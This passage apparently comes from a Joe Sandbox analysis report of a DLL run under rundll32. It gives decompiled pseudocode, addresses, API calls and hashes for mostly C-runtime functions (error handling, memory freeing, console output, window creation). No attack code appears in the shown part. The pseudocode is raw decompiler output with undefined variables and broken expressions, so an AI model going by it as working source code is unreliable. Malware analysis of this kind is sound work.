Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

GetLastError.KERNEL32 ref: 10026A37
__dosmaperr.LIBCMT ref: 10026A3E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10026A7D
__dosmaperr.LIBCMT ref: 10026A84

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction ID: bd05e1bc39f87d2aee2b562c84437264c3a7a5bb9226fc401e292b52289c8790
Opcode Fuzzy Hash: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction Fuzzy Hash: BE21C575600216BFD710DFA5AC8195BB7ECFF093A47A2C529F919A7151DB30FC408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023FB6, Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10023FB6(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E10026850(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t51);
							if(__eflags != 0) {
								E10023C29(_t51, 0x1004e3b0);
								E100268B3(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E1002A0C5(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E10012120(_t39, _t43, _t49, _t60);
					asm("int3");
					_t5 =  *0x1004d0a0; // 0xffffffff
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E1002A104(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E10026850(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E1002A104(__eflags,  *0x1004d0a0, _t60);
								if(__eflags != 0) {
									E10023C29(_t60, 0x1004e3b0);
									E100268B3(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E1002A104(__eflags,  *0x1004d0a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E1002A104(__eflags,  *0x1004d0a0, _t20);
								_push(_t60);
								L25:
								E100268B3();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E1002A0C5(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x1004d0a0; // 0xffffffff
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E10012120(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x1004d0a0; // 0xffffffff
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E1002A104(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E10026850(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E1002A104(__eflags,  *0x1004d0a0, _t54);
											if(__eflags != 0) {
												E10023C29(_t54, 0x1004e3b0);
												E100268B3(0);
												goto L45;
											} else {
												_t40 = 0;
												E1002A104(__eflags,  *0x1004d0a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E1002A104(0,  *0x1004d0a0, 0);
											_push(0);
											L41:
											E100268B3();
											goto L36;
										}
									}
								} else {
									_t54 = E1002A0C5(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x1004d0a0; // 0xffffffff
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x10023fb6
0x10023fb6
0x10023fc1
0x10023fc3
0x10023fc8
0x10023fcb
0x10023fe9
0x10023fec
0x10023ff1
0x10023ff3
0x00000000
0x10023ff5
0x10024001
0x10024004
0x10024005
0x10024007
0x1002402c
0x1002402e
0x10024047
0x1002404e
0x10024053
0x00000000
0x10024030
0x10024030
0x10024039
0x1002403e
0x00000000
0x1002403e
0x10024009
0x10024009
0x10024009
0x10024012
0x10024017
0x10024018
0x10024018
0x1002401d
0x00000000
0x1002401d
0x10024007
0x10023fcd
0x10023fd3
0x10023fd7
0x10023fe4
0x00000000
0x10023fd9
0x10023fdc
0x10024056
0x10024056
0x10023fde
0x10023fde
0x10023fde
0x10023fe0
0x10023fe0
0x10023fe0
0x10023fdc
0x10023fd7
0x10024059
0x10024061
0x10024063
0x10024065
0x1002406d
0x10024072
0x10024073
0x10024078
0x10024079
0x1002407c
0x10024096
0x10024099
0x1002409e
0x100240a0
0x00000000
0x100240a2
0x100240ae
0x100240b1
0x100240b2
0x100240b4
0x100240d7
0x100240d9
0x100240f0
0x100240f7
0x100240fc
0x00000000
0x100240db
0x100240e2
0x100240e7
0x00000000
0x100240e7
0x100240b6
0x100240bd
0x100240c2
0x100240c3
0x100240c3
0x100240c8
0x00000000
0x100240c8
0x100240b4
0x1002407e
0x10024084
0x10024086
0x10024088
0x10024091
0x00000000
0x1002408a
0x1002408a
0x1002408d
0x10024107
0x10024107
0x1002410c
0x1002410f
0x10024110
0x10024111
0x10024118
0x1002411a
0x1002411f
0x10024122
0x10024140
0x10024143
0x10024148
0x1002414a
0x00000000
0x1002414c
0x10024158
0x1002415c
0x1002415e
0x10024183
0x10024185
0x1002419e
0x100241a5
0x00000000
0x10024187
0x10024187
0x10024190
0x10024195
0x00000000
0x10024195
0x10024160
0x10024160
0x10024160
0x10024169
0x1002416e
0x1002416f
0x1002416f
0x00000000
0x10024174
0x1002415e
0x10024124
0x1002412a
0x1002412c
0x1002412e
0x1002413b
0x00000000
0x10024130
0x10024130
0x10024133
0x100241ad
0x100241ad
0x10024135
0x10024135
0x10024135
0x10024135
0x10024137
0x10024137
0x10024137
0x10024133
0x1002412e
0x100241b0
0x100241b8
0x100241ba
0x100241ba
0x100241c1
0x1002408f
0x100240ff
0x100240ff
0x10024101
0x00000000
0x10024103
0x10024106
0x10024106
0x10024101
0x1002408d
0x10024088
0x10024067
0x1002406c
0x1002406c

APIs

GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
_free.LIBCMT ref: 10024018
_free.LIBCMT ref: 1002404E
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction ID: 23280f8c2260b11c3a06f993c25238af481de1058feaba7f8c12448f37a63b00
Opcode Fuzzy Hash: a1aad8c9c926d5f200dfc129fa4bf32ee5e2d12d2605714079376170c75a9ece
Instruction Fuzzy Hash: AE11E3367042052FE241E7647EC6E1B22A9DBC26B4BE30235FB24D32E2DD319C918524

Uniqueness

Uniqueness Score: -1.00%

Function 1002410D, Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1002410D(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x1004d0a0; // 0xffffffff
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1002A104(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E10026850(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E1002A104(__eflags,  *0x1004d0a0, _t18);
							if(__eflags != 0) {
								E10023C29(_t18, 0x1004e3b0);
								E100268B3(0);
								goto L13;
							} else {
								_t13 = 0;
								E1002A104(__eflags,  *0x1004d0a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E1002A104(0,  *0x1004d0a0, 0);
							_push(0);
							L9:
							E100268B3();
							goto L4;
						}
					}
				} else {
					_t18 = E1002A0C5(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x1004d0a0; // 0xffffffff
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x10024118
0x1002411a
0x1002411f
0x10024122
0x10024140
0x10024143
0x10024148
0x1002414a
0x00000000
0x1002414c
0x10024158
0x1002415c
0x1002415e
0x10024183
0x10024185
0x1002419e
0x100241a5
0x00000000
0x10024187
0x10024187
0x10024190
0x10024195
0x00000000
0x10024195
0x10024160
0x10024160
0x10024160
0x10024169
0x1002416e
0x1002416f
0x1002416f
0x00000000
0x10024174
0x1002415e
0x10024124
0x1002412a
0x1002412e
0x1002413b
0x00000000
0x10024130
0x10024133
0x100241ad
0x100241ad
0x10024135
0x10024135
0x10024135
0x10024137
0x10024137
0x10024137
0x10024133
0x1002412e
0x100241b0
0x100241b8
0x100241c1

APIs

GetLastError.KERNEL32(00000000,7248FFF6,00000000,100244A3,1000FB64,1000E746,00000000,00000000), ref: 10024112
_free.LIBCMT ref: 1002416F
_free.LIBCMT ref: 100241A5
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 100241B0

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction ID: 57a6f9a0da5a3930e0307264933162919cbfd296d3a065086be207032b37c94b
Opcode Fuzzy Hash: 731426067ea15b7500fd783031a9d42682068e30897745dd2089e4c5b4501170
Instruction Fuzzy Hash: 8611A53A3016516FE601E6757DC6F1B36A9DBD26B4FE30235F924D32E2DE219CA18114

Uniqueness

Uniqueness Score: -1.00%

Function 10023E5B, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10023E5B(void* __ecx) {
				intOrPtr _t3;
				signed int _t4;
				signed int _t6;
				signed int _t13;
				signed int _t14;
				long _t21;
				signed int _t23;

				_t21 = GetLastError();
				_t3 =  *0x1004d0a0; // 0xffffffff
				_t27 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					L4:
					_t4 = E1002A104(__eflags, _t3, 0xffffffff);
					__eflags = _t4;
					if(_t4 != 0) {
						_t23 = E10026850(1, 0x364);
						__eflags = _t23;
						if(__eflags != 0) {
							_t6 = E1002A104(__eflags,  *0x1004d0a0, _t23);
							__eflags = _t6;
							if(_t6 != 0) {
								E10023C29(_t23, 0x1004e3b0);
								E100268B3(0);
								_t14 = _t23;
							} else {
								_t14 = 0;
								__eflags = 0;
								E1002A104(0,  *0x1004d0a0, 0);
								_push(_t23);
								goto L10;
							}
						} else {
							_t14 = 0;
							E1002A104(__eflags,  *0x1004d0a0, 0);
							_push(0);
							L10:
							E100268B3();
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t13 = E1002A0C5(_t27, _t3);
					if(_t13 == 0) {
						_t3 =  *0x1004d0a0; // 0xffffffff
						goto L4;
					} else {
						_t1 = _t13 + 1; // 0x1
						asm("sbb ebx, ebx");
						_t14 =  ~_t1 & _t13;
					}
				}
				SetLastError(_t21);
				return _t14;
			}

0x10023e65
0x10023e67
0x10023e6c
0x10023e6f
0x10023e8b
0x10023e8e
0x10023e93
0x10023e95
0x10023ea8
0x10023eac
0x10023eae
0x10023ec8
0x10023ecd
0x10023ecf
0x10023eee
0x10023ef5
0x10023efd
0x10023ed1
0x10023ed1
0x10023ed1
0x10023eda
0x10023edf
0x00000000
0x10023edf
0x10023eb0
0x10023eb0
0x10023eb9
0x10023ebe
0x10023ee0
0x10023ee0
0x10023ee5
0x10023e97
0x10023e97
0x10023e97
0x10023e71
0x10023e72
0x10023e79
0x10023e86
0x00000000
0x10023e7b
0x10023e7b
0x10023e80
0x10023e82
0x10023e82
0x10023e79
0x10023f01
0x10023f0b

APIs

GetLastError.KERNEL32 ref: 10023E5F
_free.LIBCMT ref: 10023EE0
SetLastError.KERNEL32(00000000), ref: 10023F01

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction ID: e08d1e95c12827319e42ff99bf0cbd6eb4c5bc448b54ed9f77757ffd9b9b94e2
Opcode Fuzzy Hash: 445ed5583abc66aff0091bdda5422eaa6d15ea046edcdaec4caaf5e3fdfc071f
Instruction Fuzzy Hash: DF1104357053226FEB10E7B4BEC6F1B3798DB022B8BE20235FD10D21E2DE546C4A9164

Uniqueness

Uniqueness Score: -1.00%

Function 100012B1, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100012B1(struct HINSTANCE__* _a4, int _a8) {
				signed int _v8;
				void* _v140;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t8;
				void* _t22;
				struct HINSTANCE__* _t25;
				struct HWND__* _t26;
				signed int _t27;

				_t8 =  *0x1004d054; // 0x940b3682
				_v8 = _t8 ^ _t27;
				_t25 = _a4;
				 *0x1004db64 = _t25;
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				_t13 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				 *0x1004dc35 =  ==  ? 1 :  *0x1004dc35 & 0x000000ff;
				_t26 = CreateWindowExA(0, 0x1004dbd0, 0x1004db68, 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, _t25, 0);
				if(_t26 != 0) {
					ShowWindow(_t26, _a8);
					UpdateWindow(_t26);
				}
				return E100037EA(1, _v8 ^ _t27, _t22);
			}

0x100012ba
0x100012c1
0x100012c5
0x100012d0
0x100012d6
0x100012e0
0x100012f7
0x10001301
0x10001324
0x10001328
0x1000132e
0x10001335
0x1000133b
0x1000134a

APIs

GetVersionExA.KERNEL32(?), ref: 100012E0
CreateWindowExA.USER32 ref: 1000131E
ShowWindow.USER32(00000000,?), ref: 1000132E
UpdateWindow.USER32 ref: 10001335

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Window$CreateShowUpdateVersion
String ID:
API String ID: 738887465-0
Opcode ID: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction ID: 341d4f5b6357358a1a841b5e4f677a2f36a9486d77b2b7535788157dddeffb30
Opcode Fuzzy Hash: 77d7adeb2b38e3cd895246d4cacae244cc3e5b3733acf5e48cb798dca9cd61a3
Instruction Fuzzy Hash: 3F01B571610138BFE7149B24CE89FAB7BACEB46200F41415AF905D3210CB70AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8D4, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003B8D4(void** _a4) {
				void* _t12;
				void** _t13;

				_t13 = _a4;
				_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], 0);
				if(_t12 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t12 = WriteConsoleW( *0x1004d8f0,  *_t13, _t13[1], _t13[2], _t12);
				}
				return _t12;
			}

0x1003b8da
0x1003b8f4
0x1003b8f8
0x1003b905
0x1003b90a
0x1003b924
0x1003b924
0x1003b92b

APIs

WriteConsoleW.KERNEL32 ref: 1003B8EE
GetLastError.KERNEL32 ref: 1003B8FA

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B90A

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003B91E

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction ID: 383a7036c8f4c86a359b566b59d293377cabd9f826cc08592a6f7cb210b54fdd
Opcode Fuzzy Hash: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction Fuzzy Hash: E5F05E3A200516BFDB126B96CD48B467BF6EFCA261B11441AFB49C6530CA31A850DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1003B9BA, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1003B9BA(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x1003b9d7
0x1003b9db
0x1003b9e8
0x1003b9ed
0x1003ba08
0x1003ba08
0x1003ba0e

APIs

WriteConsoleW.KERNEL32 ref: 1003B9D1
GetLastError.KERNEL32(?,100395D6,?,00000001,?,00000001,?,10032A34,?,?,00000001,?,00000001,?,10032F91,1002B316), ref: 1003B9DD

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B9ED

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003BA02

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction ID: b907945a8bb2440a8cb3aef72e6a2d2f21cc4e48b824f8509c024221972a3f23
Opcode Fuzzy Hash: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction Fuzzy Hash: 50F01236100566BFDB126F91CC48A893F65EF092A1F014015FF08D6130C6318860DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10011DD7, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011DD7() {

				E100268B3( *0x1004e850);
				 *0x1004e850 = 0;
				E100268B3( *0x1004e854);
				 *0x1004e854 = 0;
				E100268B3( *0x1004e538);
				 *0x1004e538 = 0;
				E100268B3( *0x1004e53c);
				 *0x1004e53c = 0;
				return 1;
			}

0x10011de0
0x10011ded
0x10011df3
0x10011dfe
0x10011e04
0x10011e0f
0x10011e15
0x10011e1d
0x10011e26

APIs

_free.LIBCMT ref: 10011DE0

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10011DF3
_free.LIBCMT ref: 10011E04
_free.LIBCMT ref: 10011E15

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction ID: b92291fbf5b9387dec10b5d829ed7a1edaa60bcb681d517941d5f30f05375802
Opcode Fuzzy Hash: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction Fuzzy Hash: FBE0B6798199B0ABFB02AF54FFC14493BA1E74A758345015EFC08D2231DF351E629F99

Uniqueness

Uniqueness Score: -1.00%

Function 100250E8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E100250E8(signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				intOrPtr _v20;
				char _v180;
				short _v202;
				short _v204;
				short _v206;
				signed short _v208;
				signed short _v210;
				signed short _v212;
				char _v468;
				signed int* _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				signed int _v492;
				signed int _v496;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				signed short _t102;
				signed short _t104;
				signed int _t106;
				void* _t109;
				signed int _t110;
				signed int _t114;
				intOrPtr _t119;
				signed int _t127;
				signed int _t129;
				signed short _t133;
				signed int _t135;
				char* _t136;
				signed int _t137;
				intOrPtr _t140;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				signed int* _t153;
				void* _t154;
				signed int* _t160;
				void* _t162;
				void* _t164;
				intOrPtr* _t176;
				signed int _t177;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t185;
				signed int* _t189;
				signed int _t191;
				intOrPtr _t192;
				signed int* _t193;
				signed int _t195;
				void* _t196;
				signed int* _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;

				_t191 = __edx;
				_t83 =  *0x1004d054; // 0x940b3682
				_v8 = _t83 ^ _t199;
				_t149 = _a8;
				_t197 = _a4;
				_v488 = _a24;
				_t86 = 0;
				_v496 = _t149;
				_t192 = _a16;
				if(_t197 == 0) {
					L70:
					return E100037EA(_t86, _v8 ^ _t199, _t191);
				} else {
					_v484 = 0;
					if( *_t197 != 0x43 || _t197[0] != 0) {
						_t89 = E10023FB6(_t154, _t191) + 0x50;
						_t13 = _t89 + 0x18; // -56
						_v472 = _t13;
						_t15 = _t89 + 0x122; // 0xd2
						_t150 = _t15;
						_t16 = _t89 + 0x1c; // -52
						_v476 = _t150;
						_v480 = _t16;
						E100249B6(_t150,  &_v512, _t192, _t192, _a20, E10023FB6(_t154, _t191) + 0x50);
						_t193 = _t197;
						_t191 = 0;
						__eflags = 0;
						_t160 =  &(_t193[0]);
						do {
							_t91 =  *_t193;
							_t193 =  &(_t193[0]);
							__eflags = _t91;
						} while (_t91 != 0);
						_t195 = _t193 - _t160 >> 1;
						_v492 = _t195;
						__eflags = _t195 - 0x83;
						if(_t195 >= 0x83) {
							L24:
							_t92 = E1002A5FE();
							__eflags = _t92;
							_t152 = 0 | _t92 == 0x00000000;
							_t94 = E10024EA3(_t152, _t160, _t191, _t195,  &_v468, _t197);
							_pop(_t162);
							__eflags = _t94;
							if(_t94 != 0) {
								_t153 = _v472;
								goto L33;
							} else {
								_t136 =  &_v468;
								__eflags = _t152;
								_t153 = _v472;
								_push(_t136);
								_push(_t153);
								_push(_t136);
								if(__eflags == 0) {
									_t137 = E100303BF(_t162, _t191, __eflags);
								} else {
									_t137 = E10030D3E(_t162, _t191, __eflags);
								}
								_t200 = _t200 + 0xc;
								__eflags = _t137;
								if(_t137 == 0) {
									L33:
									_t95 = E1002A35B(_t197);
									_push(_t197);
									__eflags = _t95;
									if(_t95 == 0) {
										_push( &_v468);
										_t97 = E1002605B();
										_pop(_t164);
										__eflags = _t97;
										if(_t97 == 0) {
											L67:
											__eflags = 0;
											_t149 = 0;
											goto L68;
										} else {
